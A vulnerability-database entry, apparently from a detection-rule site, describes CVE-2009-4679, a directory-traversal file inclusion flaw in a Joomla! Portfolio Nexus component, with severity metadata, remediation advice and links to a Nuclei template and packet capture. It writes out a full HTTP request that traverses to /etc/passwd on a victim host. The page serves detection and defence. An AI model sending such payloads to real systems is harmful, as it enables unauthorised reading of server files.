🔙 목록으로 돌아가기

CVE-2009-4679: Joomla! Portfolio Nexus - Remote File Inclusion

TitleJoomla! Portfolio Nexus - Remote File Inclusion
Authordaffainfo
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
RemediationApply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability.
CVSS Score7.5
EPSS Score0.23302
CVE IDCVE-2009-4679
CWE IDCWE-22
Tags cve2009 cve joomla lfi nexus edb inertialfate vuln

🔍 Vulnerability Description

Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-4679.yaml

🦈 Packet Capture: ⬇️ Download cve-2009-4679.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A